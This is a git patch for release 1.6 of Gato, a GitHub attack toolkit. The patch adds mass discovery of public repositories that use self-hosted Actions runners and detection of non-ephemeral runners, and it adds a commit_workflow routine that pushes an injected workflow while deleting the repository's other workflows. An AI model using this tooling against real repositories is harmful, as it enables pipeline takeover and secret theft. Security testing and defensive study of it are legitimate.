From 8683d3350db0846f3666bba7c763a7447aa83055 Mon Sep 17 00:00:00 2001
From: Adnan Khan <AdnaneKhan@users.noreply.github.com>
Date: Sat, 23 Dec 2023 16:08:14 -0500
Subject: [PATCH] Release 1.6 (#58)

Co-authored-by: Mason Davis <31484153+mas0nd@users.noreply.github.com>
Co-authored-by: Remy <remy.trompier@gmail.com>
---
 README.md                               |  50 +++--
 gato/attack/attack.py                   |  13 +-
 gato/cli/cli.py                         |  52 ++++-
 gato/enumerate/enumerate.py             |  15 +-
 gato/enumerate/recommender.py           |   7 +-
 gato/enumerate/repository.py            |  63 +++++-
 gato/github/__init__.py                 |   1 +
 gato/github/api.py                      | 272 ++++++++++++++++++++++--
 gato/github/gql_queries.py              |  54 +++++
 gato/github/search.py                   |   2 +-
 gato/models/runner.py                   |   7 +-
 gato/search/search.py                   |  82 ++++++-
 gato/workflow_parser/workflow_parser.py |  78 ++++++-
 pyproject.toml                          |   2 +-
 test/test_cases.json                    |   2 +-
 unit_test/test_api.py                   |  98 ++++++++-
 unit_test/test_enumerate.py             |  10 +-
 unit_test/test_repo_enumerate.py        |   4 +-
 18 files changed, 723 insertions(+), 89 deletions(-)
 create mode 100644 gato/github/gql_queries.py

diff --git a/README.md b/README.md
index a2d5be7..d1ab5fe 100644
--- a/README.md
+++ b/README.md
@@ -8,28 +8,43 @@
 
 
 Gato, or GitHub Attack Toolkit, is an enumeration and attack tool that allows both 
-blue teamers and offensive security practitioners to evaluate the blast radius 
-of a compromised personal access token within a GitHub organization.
+blue teamers and offensive security practitioners to identify and exploit 
+pipeline vulnerabilities within a GitHub organization's public and private 
+repositories.
 
-The tool also allows searching for and thoroughly enumerating public
-repositories that utilize self-hosted runners. GitHub recommends that
-self-hosted runners only be utilized for private repositories, however, there
-are thousands of organizations that utilize self-hosted runners.
+The tool has post-exploitation features to leverage a compromised personal
+access token in addition to enumeration features to identify poisoned pipeline
+execution vulnerabilities against public repositories that use self-hosted GitHub Actions 
+runners.
 
-## Version 1.5 Released
+GitHub recommends that self-hosted runners only be utilized for private repositories, however, there are thousands of organizations that utilize self-hosted runners. Default configurations are often vulnerable, and Gato uses a mix of workflow file analysis and run-log analysis to identify potentially vulnerable repositories at scale.
 
-Gato version 1.5 was released on June 27th, 2023!
+## Version 1.6
 
-#### New Features
+Gato version 1.6 improves the public repository enumeration feature set.
 
-* Secrets Enumeration
-* Secrets Exfiltration
-* API-only Enumeration
-* JSON Output
-* Improved Code Search
-* GitHub Enterprise Server Support
-* PAT Validation Only Mode
-* Quality of life and UX improvements
+Previously, Gato's code search functionality by default only looked for
+yaml files that explicitly had "self-hosted" in the name. Now, the
+code search functionality supports a SourceGraph query. This query has a 
+lower false negative rate and is not limited by GitHub's code search limit.
+
+For example, the following query will identify public repositories that use 
+self-hosted runners:
+
+`gato search --sourcegraph --output-text public_repos.txt`
+
+This can be fed back into Gato's enumeration feature:
+
+`gato enumerate --repositories public_repos.txt --output-json enumeration_results.json`
+
+Additionally the release contains several improvements under the hood to speed up the enumeration process. This includes changes to limit redundant run-log downloads (which are the slowest part of Gato's enumeration process) and using the GraphQL API to download workflow files when enumerating an entire organization. Finally, Gato will use a heuristic to detect if an attached runner is non-ephemeral. Most poisoned pipeline execution attacks require a non-ephemeral runner in order to exploit.
+
+### New Features
+
+* SourceGraph Search Functionality
+* Improved Public Repository Enumeration Speed
+* Improved Workflow File Analysis
+* Non-ephemeral self-hosted runner detection
 
 ## Who is it for?
 
@@ -44,6 +59,7 @@ Gato version 1.5 was released on June 27th, 2023!
 
 * GitHub Classic PAT Privilege Enumeration
 * GitHub Code Search API-based enumeration
+* SourceGraph Search enumeration
 * GitHub Action Run Log Parsing to identify Self-Hosted Runners
 * Bulk Repo Sparse Clone Features
 * GitHub Action Workflow Parsing
diff --git a/gato/attack/attack.py b/gato/attack/attack.py
index e830c2c..d22a502 100644
--- a/gato/attack/attack.py
+++ b/gato/attack/attack.py
@@ -181,28 +181,23 @@ def __execute_and_wait_workflow(
         """
 
         workflow_id = None
-        branch_created = self.api.create_branch(target_repo, branch)
-
-        if not branch_created:
-            Output.error("Failed to create branch!")
-            return False
 
         if self.author_email and self.author_name:
-            rev_hash = self.api.commit_file(
+            rev_hash = self.api.commit_workflow(
                 target_repo,
                 branch,
-                f".github/workflows/{yaml_name}.yml",
                 yaml_contents.encode(),
+                f"{yaml_name}.yml",
                 commit_author=self.author_name,
                 commit_email=self.author_email,
                 message=commit_message
             )
         else:
-            rev_hash = self.api.commit_file(
+            rev_hash = self.api.commit_workflow(
                 target_repo,
                 branch,
-                f".github/workflows/{yaml_name}.yml",
                 yaml_contents.encode(),
+                f"{yaml_name}.yml",
                 message=commit_message
             )
 
diff --git a/gato/cli/cli.py b/gato/cli/cli.py
index 849af48..ef476c2 100644
--- a/gato/cli/cli.py
+++ b/gato/cli/cli.py
@@ -276,19 +276,35 @@ def search(args, parser):
         http_proxy=args.http_proxy,
         github_url=args.api_url
     )
+    if args.sourcegraph:
+        if args.query and args.target:
+            parser.error(
+                f"{Fore.RED}[-]{Style.RESET_ALL} You cannot select an organization "
+                "with a custom query!"
+            )
 
-    if not (args.query or args.target):
-        parser.error(
-            f"{Fore.RED}[-]{Style.RESET_ALL} You must select an organization "
-            "or pass a custom query!."
-        )
-
-    if args.query:
-        gh_search_runner.use_search_api(
-            organization=args.target, query=args.query
+        results = gh_search_runner.use_sourcegraph_api(
+            organization=args.target,
+            query=args.query
         )
     else:
-        gh_search_runner.use_search_api(organization=args.target)
+        if not (args.query or args.target):
+            parser.error(
+                f"{Fore.RED}[-]{Style.RESET_ALL} You must select an organization "
+                "or pass a custom query!."
+            )
+        if args.query:
+            results = gh_search_runner.use_search_api(
+                organization=args.target,
+                query=args.query
+            )
+        else:
+            results = gh_search_runner.use_search_api(
+                organization=args.target
+            )
+
+    if results:
+        gh_search_runner.present_results(results, args.output_text)
 
 
 def configure_parser_general(parser):
@@ -563,3 +579,19 @@ def configure_parser_search(parser):
         metavar="QUERY",
         required=False
     )
+
+    parser.add_argument(
+        "--sourcegraph", "-sg",
+        help="Use Sourcegraph API to search for self-hosted runners.",
+        required=False,
+        action="store_true"
+    )
+
+    parser.add_argument(
+        "--output-text", "-oT",
+        help=(
+            "Save enumeration output to text file."
+        ),
+        metavar="TEXT_FILE",
+        type=StringType(256)
+    )
diff --git a/gato/enumerate/enumerate.py b/gato/enumerate/enumerate.py
index c5ed134..3ac1254 100644
--- a/gato/enumerate/enumerate.py
+++ b/gato/enumerate/enumerate.py
@@ -1,6 +1,7 @@
 import logging
 
 from gato.github import Api
+from gato.github import GqlQueries
 from gato.models import Repository, Organization
 from gato.cli import Output
 from gato.enumerate.repository import RepositoryEnum
@@ -173,12 +174,22 @@ def enumerate_organization(self, org: str):
             f"the {organization.name} organization!"
         )
 
+        Output.info(f"Querying and caching workflow YAML files!")
+        wf_queries = GqlQueries.get_workflow_ymls(enum_list)
+  
+        for wf_query in wf_queries:
+            result = self.org_e.api.call_post('/graphql', wf_query)
+            # Sometimes we don't get a 200, fall back in this case.
+            if result.status_code == 200:
+                self.repo_e.construct_workflow_cache(result.json()['data']['nodes'])
+            else:
+                Output.warn("GraphQL query failed, will revert to REST workflow query for impacted repositories!")
         for repo in enum_list:
-
             Output.tabbed(
                 f"Enumerating: {Output.bright(repo.name)}!"
             )
-            self.repo_e.enumerate_repository(repo)
+
+            self.repo_e.enumerate_repository(repo, large_org_enum=len(enum_list) > 100)
             self.repo_e.enumerate_repository_secrets(repo)
 
             Recommender.print_repo_secrets(
diff --git a/gato/enumerate/recommender.py b/gato/enumerate/recommender.py
index c391961..9ecee80 100644
--- a/gato/enumerate/recommender.py
+++ b/gato/enumerate/recommender.py
@@ -140,7 +140,7 @@ def print_repo_runner_info(repository: Repository):
             Output.result(
                 f"The repository contains a workflow: "
                 f"{Output.bright(repository.sh_workflow_names[0])} that "
-                "executes on self-hosted runners!"
+                "might execute on self-hosted runners!"
             )
 
         if repository.accessible_runners:
@@ -157,6 +157,11 @@ def print_repo_runner_info(repository: Repository):
                 f"{Output.bright(repository.accessible_runners[0].machine_name)}"
             )
 
+            for runner in repository.accessible_runners:
+                if runner.non_ephemeral:
+                    Output.owned("The repository contains a non-ephemeral self-hosted runner!")
+                    break
+
         if repository.runners:
             Output.result(
                 f"The repository has {len(repository.runners)} repo-level"
diff --git a/gato/enumerate/repository.py b/gato/enumerate/repository.py
index 58e7a3c..dfc2885 100644
--- a/gato/enumerate/repository.py
+++ b/gato/enumerate/repository.py
@@ -21,6 +21,7 @@ def __init__(self, api: Api, skip_log: bool, output_yaml):
             api (Api): GitHub API wraper object.
         """
         self.api = api
+        self.workflow_cache = {}
         self.skip_log = skip_log
         self.output_yaml = output_yaml
 
@@ -40,11 +41,12 @@ def __perform_runlog_enumeration(self, repository: Repository):
         )
 
         if wf_runs:
-            runner = Runner(
-                wf_runs[0]['runner_name'], wf_runs[0]['machine_name']
-            )
+            for wf_run in wf_runs:
+                runner = Runner(
+                    wf_run['runner_name'], wf_run['machine_name'], non_ephemeral=wf_run['non_ephemeral']
+                )
 
-            repository.add_accessible_runner(runner)
+                repository.add_accessible_runner(runner)
             runner_detected = True
 
         return runner_detected
@@ -60,12 +62,15 @@ def __perform_yml_enumeration(self, repository: Repository):
             list: List of workflows that execute on sh runner, empty otherwise.
         """
         runner_wfs = []
-        ymls = self.api.retrieve_workflow_ymls(repository.name)
+
+        if repository.name in self.workflow_cache:
+            ymls = self.workflow_cache[repository.name]
+        else:
+            ymls = self.api.retrieve_workflow_ymls(repository.name)
 
         for (wf, yml) in ymls:
             try:
                 parsed_yml = WorkflowParser(yml, repository.name, wf)
-
                 self_hosted_jobs = parsed_yml.self_hosted()
 
                 if self_hosted_jobs:
@@ -79,12 +84,13 @@ def __perform_yml_enumeration(self, repository: Repository):
             # At this point we only know the extension, so handle and
             #  ignore malformed yml files.
             except Exception as parse_error:
-                print(parse_error)
+
+                print(f"{wf}: {str(parse_error)}")
                 logger.warning("Attmpted to parse invalid yaml!")
 
         return runner_wfs
 
-    def enumerate_repository(self, repository: Repository):
+    def enumerate_repository(self, repository: Repository, large_org_enum=False):
         """Enumerate a repository, and check everything relevant to
         self-hosted runner abuse that that the user has permissions to check.
 
@@ -119,15 +125,25 @@ def enumerate_repository(self, repository: Repository):
 
                 repository.set_runners(repo_runners)
 
-        if not self.skip_log and self.__perform_runlog_enumeration(repository):
-            runner_detected = True
-
         workflows = self.__perform_yml_enumeration(repository)
 
         if len(workflows) > 0:
             repository.add_self_hosted_workflows(workflows)
             runner_detected = True
 
+        if not self.skip_log:
+            # If we are enumerating an organization, only enumerate runlogs if
+            # the workflow suggests a sh_runner.
+            if large_org_enum and runner_detected:
+                self.__perform_runlog_enumeration(repository)
+
+            # If we are doing internal enum, get the logs, because coverage is
+            # more important here and it's ok if it takes time.
+            elif not repository.is_public() and self.__perform_runlog_enumeration(repository):
+                runner_detected = True
+            else:
+                runner_detected = self.__perform_runlog_enumeration(repository)
+
         if runner_detected:
             # Only display permissions (beyond having none) if runner is
             # detected.
@@ -158,3 +174,28 @@ def enumerate_repository_secrets(
 
             if org_secrets:
                 repository.set_accessible_org_secrets(org_secrets)
+
+    def construct_workflow_cache(self, yml_results):
+        """Creates a cache of workflow yml files retrieved from graphQL. Since
+        graphql and REST do not have parity, we still need to use rest for most
+        enumeration calls. This method saves off all yml files, so during org
+        level enumeration if we perform yml enumeration the cached file is used
+        instead of making github REST requests. 
+
+        Args:
+            yml_results (list): List of results from individual GraphQL queries
+            (100 nodes at a time).
+        """
+        for result in yml_results:
+            owner = result['nameWithOwner']
+
+            self.workflow_cache[owner] = list()
+
+            if not result['object']:
+                continue
+
+            for yml_node in result['object']['entries']:
+                yml_name = yml_node['name']
+                if yml_name.lower().endswith('yml') or yml_name.lower().endswith('yaml'):
+                    contents = yml_node['object']['text']
+                    self.workflow_cache[owner].append((yml_name, contents))
diff --git a/gato/github/__init__.py b/gato/github/__init__.py
index a0f8375..284d7c1 100644
--- a/gato/github/__init__.py
+++ b/gato/github/__init__.py
@@ -1,2 +1,3 @@
 from .api import Api
+from .gql_queries import GqlQueries
 from .search import Search
diff --git a/gato/github/api.py b/gato/github/api.py
index f8629b3..77807cc 100644
--- a/gato/github/api.py
+++ b/gato/github/api.py
@@ -8,7 +8,7 @@
 import io
 
 from gato.cli import Output
-from datetime import datetime, timezone
+from datetime import datetime, timezone, timedelta
 
 logger = logging.getLogger(__name__)
 
@@ -19,8 +19,9 @@ class Api():
     rate limiting or network issues.
     """
 
-    RUNNER_RE = re.compile(r'Runner name: \'([\w+-]+)\'')
-    MACHINE_RE = re.compile(r'Machine name: \'([\w+-]+)\'')
+    RUNNER_RE = re.compile(r'Runner name: \'([\w+-.]+)\'')
+    MACHINE_RE = re.compile(r'Machine name: \'([\w+-.]+)\'')
+    RUN_THRESHOLD = 90
 
     def __init__(self, pat: str, version: str = "2022-11-28",
                  http_proxy: str = None, socks_proxy: str = None,
@@ -110,12 +111,29 @@ def __process_run_log(self, log_content: bytes, run_info: dict):
         Returns:
             dict: metadata about the run execution.
         """
-        with zipfile.ZipFile(io.BytesIO(log_content)) as runres:
+        log_package = None
+        non_ephemeral = False
 
+        with zipfile.ZipFile(io.BytesIO(log_content)) as runres:
             for zipinfo in runres.infolist():
+                # TODO use a lambda for this messy logic
+                if "checkout" in zipinfo.filename or "Checkout" in zipinfo.filename:
+                    with runres.open(zipinfo) as run_setup:
+                        content = run_setup.read().decode()
+                        if "Cleaning the repository" in content:
+                            non_ephemeral = True
+
+                        if log_package:
+                            log_package['non_ephemeral'] = non_ephemeral
+
                 if "Set up job" in zipinfo.filename:
                     with runres.open(zipinfo) as run_setup:
                         content = run_setup.read().decode()
+                        if "Image Release: https://github.com/actions/runner-images" in content:
+                            # Larger runners will appear to be self-hosted, but
+                            # they will have the image name. Skip if we see this.
+                            continue
+
                         if "Runner name" in content or \
                                 "Machine name" in content:
 
@@ -132,9 +150,10 @@ def __process_run_log(self, log_content: bytes, run_info: dict):
                                 "runner_name": runner_name,
                                 "machine_name": hostname,
                                 "run_id": run_info["id"],
-                                "run_attempt": run_info["run_attempt"]
+                                "run_attempt": run_info["run_attempt"],
+                                "non_ephemeral": non_ephemeral
                             }
-                            return log_package
+        return log_package
 
     def __get_full_runlog(self, log_content: bytes, run_name: str):
         """Gets the full text of the runlog from the zip file by matching the
@@ -155,6 +174,24 @@ def __get_full_runlog(self, log_content: bytes, run_name: str):
 
                         return content
 
+    @staticmethod
+    def __verify_result(response: requests.Response, expected_code: int):
+        """Verifies that the response matches the expected code. If it does not
+        match, then the response is logged and the program exits.
+
+        Args:
+            response (requests.Response): Response object from a request.
+            expected_code (int): Expected status code from the request.
+        """
+        if response.status_code != expected_code:
+            logger.warn(
+                f"Expected status code {expected_code}, but got "
+                f"{response.status_code}!"
+            )
+            logger.debug(response.text)
+            return False
+        return True
+
     def call_get(self, url: str, params: dict = None, strip_auth=False):
         """Internal method to wrap a GET request so that proxies and headers
         do not need to be repeated.
@@ -212,8 +249,34 @@ def call_post(self, url: str, params: dict = None):
 
         return api_response
 
+    def call_patch(self, url: str, params: dict = None):
+        """Internal method to wrap a PATCH request so that proxies and headers
+        do not need to be updated in each method.
+
+        Args:
+            url (str): URL path to make PATCH request to.
+            params (dict, optional): Parameters to send as part of the request.
+            Defaults to None.
+        Returns:
+            Response: Returns the requests response object.
+        """
+        request_url = self.github_url + url
+        logger.debug(f'Making PATCH API request to {request_url}!')
+
+        api_response = requests.patch(request_url, headers=self.headers,
+                                      proxies=self.proxies, json=params,
+                                      verify=self.verify_ssl)
+        logger.debug(
+            f'The PATCH request to {request_url} returned a '
+            f'{api_response.status_code}!')
+
+        self.__check_rate_limit(api_response.headers)
+
+        return api_response
+
     def call_put(self, url: str, params: dict = None):
-        """_summary_
+        """Internal method to wrap a PUT request so that proxies and headers
+        do not need to be updated in each method.
 
         Args:
             url (stre): _description_
@@ -601,30 +664,59 @@ def retrieve_run_logs(self, repo_name: str, short_circuit: str = True):
         Returns:
             list: List of run logs for runs that ran on self-hosted runners.
         """
-        runs = self.call_get(f'/repos/{repo_name}/actions/runs')
+        start_date = datetime.now() - timedelta(days = 60)
+        runs = self.call_get(
+            f'/repos/{repo_name}/actions/runs', params={
+                "per_page": "30",
+                "status":"completed",
+                "exclude_pull_requests": "true",
+                "created":f">{start_date.isoformat()}"
+            }
+        )
 
-        run_logs = []
+        # This is a dictionary so we can de-duplicate runner IDs based on
+        # the machine_name:runner_name.
+        run_logs = {}
+        names = set()
 
         if runs.status_code == 200:
             logger.debug(f'Enumerating runs within {repo_name}')
             for run in runs.json()['workflow_runs']:
+
+                # We are only interested in runs that actually executed.
+                if run['conclusion'] != 'success' and \
+                    run['conclusion'] != 'failure':
+                    continue
+
+                if short_circuit:                
+                    # If we are only looking for the presence of SH runners and
+                    # not trying to determine ephmeral vs not from repeats, then
+                    # we just need to look at each branch + wf combination once.
+                    workflow_key = f"{run['head_branch']}:{run['path']}"
+                    if workflow_key in names:
+                        continue                
+                    names.add(workflow_key)
+
                 run_log = self.call_get(
                     f'/repos/{repo_name}/actions/runs/{run["id"]}/'
                     f'attempts/{run["run_attempt"]}/logs')
-
                 if run_log.status_code == 200:
                     run_log = self.__process_run_log(run_log.content, run)
                     if run_log:
-                        run_logs.append(run_log)
+                        key = f"{run_log['machine_name']}:{run_log['runner_name']}"
+                        run_logs[key] = run_log
+
                         if short_circuit:
-                            return run_logs
+                            return run_logs.values()
+                elif run_log.status_code == 410:
+                    break
                 else:
                     logger.debug(
                         f"Call to retrieve run logs from {repo_name} run "
                         f"{run['id']} attempt {run['run_attempt']} returned "
                         f"{run_log.status_code}!")
 
-        return run_logs
+        return run_logs.values()
 
     def parse_workflow_runs(self, repo_name: str):
         """Returns the number of workflow runs associated with the repository.
@@ -671,12 +763,12 @@ def get_recent_workflow(self, repo_name: str, sha: str, file_name: str):
 
         if data['total_count'] == 0:
             return 0
-        
+
         # find the id of our malicious workflow
         for workflow in data['workflow_runs']:
             if f'.github/workflows/{file_name}.yml' in workflow['path']:
                 return workflow['id']
-            
+
         return 0
 
     def get_workflow_status(self, repo_name: str, workflow_id: int):
@@ -763,12 +855,14 @@ def create_branch(self, repo_name: str, branch_name: str):
             repo_name (str): Name of repository in Org/Repo format.
             branch_name (str): Name of branch to create.
         """
-
-        resp = self.call_get(f'/repos/{repo_name}/git/refs/heads')
+        resp = self.call_get(f'/repos/{repo_name}')
+        default_branch = resp.json()['default_branch']
+        resp = self.call_get(
+            f'/repos/{repo_name}/git/ref/heads/{default_branch}'
+        )
 
         json_resp = resp.json()
-
-        sha = json_resp[0]['object']['sha']
+        sha = json_resp['object']['sha']
 
         branch_data = {
             "ref": f"refs/heads/{branch_name}",
@@ -942,3 +1036,143 @@ def get_repo_org_secrets(self, repo_name: str):
                 secrets = secrets_response['secrets']
 
         return secrets
+
+    def commit_workflow(self, repo_name: str,
+                        target_branch: str,
+                        workflow_contents: bytes, file_name: str,
+                        commit_author: str = "Gato",
+                        commit_email: str = "gato@gato.infosec",
+                        message="Testing"):
+        """
+        Commits a new workflow file to a specified repository.
+
+        This function performs the following steps:
+        1. Gets the latest commit SHA of the target branch.
+        2. Gets the tree SHA of the latest commit of the new branch.
+        3. Gets the tree of the .github/workflows directory.
+        4. If the workflows tree exists, it gets the SHA of the workflows tree.
+        5. Creates a new tree where all blobs in the .github/workflows tree are removed.
+        6. Creates a new commit on the new branch with the new tree.
+        7. Updates the new branch to point to the new commit.
+
+        Args:
+            repo_name (str): The name of the repository.
+            target_branch (str): The name of the target branch.
+            workflow_contents (bytes): The content of the new workflow file.
+            file_name (str): The name of the new workflow file.
+            commit_author (str, optional): The author of the commit. Defaults to "Gato".
+            commit_email (str, optional): The email of the commit author. Defaults to "gato@gato.infosec".
+            message (str, optional): The commit message. Defaults to "Testing".
+
+        Returns:
+            str: The SHA of the new commit if the commit was successful, None otherwise.
+        """
+        # Step 1: Get latest commit SHA of target branch
+        r = self.call_get(
+            f'/repos/{repo_name}'
+        )
+        if self.__verify_result(r, 200) is False:
+            return None
+        default_branch = r.json()['default_branch']
+
+        r = self.call_get(
+            f'/repos/{repo_name}/commits/{default_branch}'
+        )
+        if self.__verify_result(r, 200) is False:
+            return None
+        latest_commit_sha = r.json()['sha']
+
+        # Step 2: Get tree SHA of latest commit of default
+        r = self.call_get(
+            f'/repos/{repo_name}/git/commits/{latest_commit_sha}'
+        )
+        if self.__verify_result(r, 200) is False:
+            return None
+        tree_sha = r.json()['tree']['sha']
+
+        # Step 3: Get the tree of the .github/workflows directory
+        r = self.call_get(
+            f'/repos/{repo_name}/git/trees/{tree_sha}',
+            params={"recursive": "1"}
+        )
+        if self.__verify_result(r, 200) is False:
+            return None
+
+        base_sha = r.json()['sha']
+        tree = r.json()['tree']
+
+        existing_files = (item for item in tree if '.github/workflows' in
+                          item['path'] and item['type'] == 'blob')
+
+        # Step 4: Create a new tree where all blobs in the .github/workflows
+        # tree are removed
+        new_workflow_file_content = base64.b64encode(
+                workflow_contents
+        ).decode()
+
+        r = self.call_post(f'/repos/{repo_name}/git/blobs', params={
+            "content": new_workflow_file_content,
+            "encoding": "base64"
+        })
+        if self.__verify_result(r, 201) is False:
+            return None
+
+        new_tree = [
+            {
+                'path': f'.github/workflows/{file_name}',
+                'mode': '100644',
+                'type': 'blob',
+                'sha': r.json()['sha']
+            }
+        ]
+
+        # Delete everything else
+        for existing in existing_files:
+            # Don't delete the same file - this will happen if the workflow
+            # already exists (such as a test.yml file)
+            if existing['path'] == f'.github/workflows/{file_name}':
+                continue
+
+            new_tree.append({
+                'path': existing['path'],
+                'mode': existing['mode'],
+                'type': existing['type'],
+                'sha': None,
+            })
+
+        r = self.call_post(
+            f'/repos/{repo_name}/git/trees', params={
+                'base_tree': base_sha,
+                'tree': new_tree
+            }
+        )
+        if self.__verify_result(r, 201) is False:
+            return None
+        new_tree_sha = r.json()['sha']
+
+        # Step 5: Create new commit on new branch
+        r = self.call_post(
+            f'/repos/{repo_name}/git/commits', params={
+                'message': message,
+                'tree': new_tree_sha,
+                'parents': [latest_commit_sha],
+                'author': {
+                    'name': commit_author,
+                    'email': commit_email
+                }
+            }
+        )
+        new_commit_sha = r.json()['sha']
+
+        # Step 6: Update the new branch to point to the new commit
+        r = self.call_post(
+            f'/repos/{repo_name}/git/refs',
+            params={
+                'sha': new_commit_sha,
+                'ref': f'refs/heads/{target_branch}'
+            }
+        )
+        if self.__verify_result(r, 201) is False:
+            return None
+
+        return new_commit_sha
diff --git a/gato/github/gql_queries.py b/gato/github/gql_queries.py
new file mode 100644
index 0000000..177c459
--- /dev/null
+++ b/gato/github/gql_queries.py
@@ -0,0 +1,54 @@
+from gato.models import Repository
+
+class GqlQueries():
+    """Constructs graphql queries for use with the GitHub GraphQL api.
+    """
+
+    GET_YMLS = """
+        query RepoFiles($node_ids: [ID!]!) {
+        nodes(ids: $node_ids) {
+            ... on Repository {
+            nameWithOwner
+            object(expression: "HEAD:.github/workflows/") {
+                ... on Tree {
+                entries {
+                    name
+                    type
+                    mode
+                    object {
+                    ... on Blob {
+                        byteSize
+                        text
+                    }
+                    }
+                }
+                }
+            }
+            }
+        }
+        }
+    """
+
+    @staticmethod
+    def get_workflow_ymls(repos: list):
+        """Retrieve workflow yml files for each repository.
+
+        Args:
+            repos (List[Repository]): List of repository objects
+        Returns:
+            (list): List of JSON post parameters for each graphQL query.
+        """
+        queries = []
+
+        for i in range(0, (len(repos) // 100) + 1):
+
+            top_len = len(repos) if len(repos) < (100 + i*100) else (100 + i*100)
+            query = {
+                "query": GqlQueries.GET_YMLS,
+                "variables": {
+                    "node_ids": [repo.repo_data['node_id'] for repo in repos[0+100*i:top_len]]
+                }
+            }
+
+            queries.append(query)
+        return queries
\ No newline at end of file
diff --git a/gato/github/search.py b/gato/github/search.py
index c793c00..88adf6c 100644
--- a/gato/github/search.py
+++ b/gato/github/search.py
@@ -46,7 +46,7 @@ def search_enumeration(
         if custom_query:
             query['q'] = custom_query
         else:
-            query['q'] = f'self-hosted org:{organization} language:yaml path:.github/workflows',
+            query['q'] = f'self-hosted org:{organization} language:yaml path:.github/workflows'
 
         next_page = f"/search/code?q={query['q']}&sort={query['sort']}" \
                     f"&per_page={query['per_page']}&page={query['page']}"
diff --git a/gato/models/runner.py b/gato/models/runner.py
index 5739a12..96626f6 100644
--- a/gato/models/runner.py
+++ b/gato/models/runner.py
@@ -11,7 +11,8 @@ def __init__(
             machine_name=None,
             os=None,
             status=None,
-            labels=[]):
+            labels=[],
+            non_ephemeral=False):
         """Constructor for runner wrapper object.
 
         Args:
@@ -27,6 +28,7 @@ def __init__(
         self.os = os
         self.status = status
         self.labels = labels
+        self.non_ephemeral = non_ephemeral
 
     def toJSON(self):
         """Converts the repository to a Gato JSON representation.
@@ -37,7 +39,8 @@ def toJSON(self):
             else "Unknown",
             "os": self.os if self.os else "Unknown",
             "status": self.status if self.status else "Unknown",
-            "labels": [label for label in self.labels]
+            "labels": [label for label in self.labels],
+            "non_ephemeral": self.non_ephemeral
         }
 
         return representation
diff --git a/gato/search/search.py b/gato/search/search.py
index db071bf..355ccde 100644
--- a/gato/search/search.py
+++ b/gato/search/search.py
@@ -1,4 +1,6 @@
 import logging
+import requests
+import json
 
 from gato.github import Search
 from gato.github import Api
@@ -57,6 +59,62 @@ def __setup_user_info(self):
 
         return True
 
+    def use_sourcegraph_api(
+            self,
+            organization: str,
+            query=None,
+            output_text=None):
+        """
+        This method is used to search for repositories in an organization using the Sourcegraph API.
+        It constructs a search query and sends a GET request to the Sourcegraph search API.
+        The results are streamed and added to a set.
+
+        Args:
+            organization (str): The name of the organization to search in.
+            query (str, optional): A custom search query. If not provided, a default query is used.
+
+        Returns:
+            set: A set of search results.
+        """
+        repo_filter = f"repo:{organization}/ " if organization else ""
+        url = "https://sourcegraph.com/.api/search/stream"
+        headers = {"Content-Type": "application/json"}
+        params = {
+            "q": (
+                "('self-hosted' OR "
+                "(/runs-on/ AND NOT "
+                "/(ubuntu-16.04|ubuntu-18.04|ubuntu-20.04|ubuntu-22.04|ubuntu-latest|"
+                "windows-2019|windows-2022|windows-latest|macos-11|macos-12|macos-13|"
+                "macos-12-xl|macos-13-xl|macos-latest|matrix.[a-zA-Z]\\s)/)) "
+                f"{repo_filter}"
+                "lang:YAML file:.github/workflows/ count:30000"
+            )
+        }
+        if query:
+            Output.info(
+                f"Searching SourceGraph with the following query: {Output.bright(query)}"
+            )
+            params["q"] = query
+        else:
+            Output.info(
+                f"Searching SourceGraph with the default Gato query: {Output.bright(params['q'])}"
+            )
+        response = requests.get(url, headers=headers, params=params, stream=True)
+        results = set()
+
+        if response.status_code == 200:
+            for line in response.iter_lines():
+                if line and line.decode().startswith("data:"):
+                    json_line = line.decode().replace("data:", "").strip()
+                    event = json.loads(json_line)
+                    for element in event:
+                        if "repository" in element:
+                            results.add(
+                                element["repository"].replace("github.com/", "")
+                            )
+
+        return results
+
     def use_search_api(self, organization: str, query=None):
         """Utilize GitHub Code Search API to try and identify repositories
         using self-hosted runners. This is subject to a high false-positive
@@ -95,10 +153,30 @@ def use_search_api(self, organization: str, query=None):
             organization, custom_query=query
         )
 
+        return candidates
+
+    def present_results(self, results, output_text=None):
+        """
+        This method is used to present the results of the search. It first
+        prints the number of non-fork repositories that matched the criteria.
+        If an output_text file path is provided, it writes the results into
+        that file. Finally, it prints each result in a tabbed format.
+
+        Args:
+            results (list): A list of non-fork repositories that matched the
+            criteria.
+            output_text (str, optional): The file path where the results
+            should be written. Defaults to None.
+        """
         Output.result(
-            f"Identified {len(candidates)} non-fork repositories that matched "
+            f"Identified {len(results)} non-fork repositories that matched "
             "the criteria!"
         )
 
-        for candidate in candidates:
+        if output_text:
+            with open(output_text, "w") as file_output:
+                for candidate in results:
+                    file_output.write(f"{candidate}\n")
+
+        for candidate in results:
             Output.tabbed(candidate)
diff --git a/gato/workflow_parser/workflow_parser.py b/gato/workflow_parser/workflow_parser.py
index 3e82ecd..f90d4ce 100644
--- a/gato/workflow_parser/workflow_parser.py
+++ b/gato/workflow_parser/workflow_parser.py
@@ -2,6 +2,7 @@
 import yaml
 from pathlib import Path
 import os
+import re
 
 logger = logging.getLogger(__name__)
 
@@ -16,6 +17,30 @@ class WorkflowParser():
     as the project grows in capability.
     """
 
+    GITHUB_HOSTED_LABELS = [
+        'ubuntu-latest',
+        'macos-latest',
+        'macOS-latest',
+        'windows-latest',
+        'ubuntu-18.04', # deprecated, but we don't want false positives on older repos.
+        'ubuntu-20.04',
+        'ubuntu-22.04',
+        'windows-2022',
+        'windows-2019',
+        'windows-2016', # deprecated, but we don't want false positives on older repos.
+        'macOS-13',
+        'macOS-12',
+        'macOS-11',
+        'macos-11',
+        'macos-12',
+        'macos-13',
+        'macos-13-xl',
+        'macos-12',
+    ]
+
+    LARGER_RUNNER_REGEX_LIST = r'(windows|ubuntu)-(22.04|20.04|2019-2022)-(4|8|16|32|64)core-(16|32|64|128|256)gb'
+    MATRIX_KEY_EXTRACTION_REGEX = r'{{\s*matrix\.([\w-]+)\s*}}'
+
     def __init__(self, workflow_yml: str, repo_name: str, workflow_name: str):
         """Initialize class with workflow file.
 
@@ -54,13 +79,64 @@ def self_hosted(self):
            list: List of jobs within the workflow that utilize self-hosted
            runners.
         """
-
         sh_jobs = []
+        if 'jobs' not in self.parsed_yml:
+            return sh_jobs
+
         for jobname, job_details in self.parsed_yml['jobs'].items():
             if 'runs-on' in job_details:
                 runs_on = job_details['runs-on']
+                # Clear cut
                 if 'self-hosted' in runs_on:
                     sh_jobs.append((jobname, job_details))
+                elif 'matrix.' in runs_on:
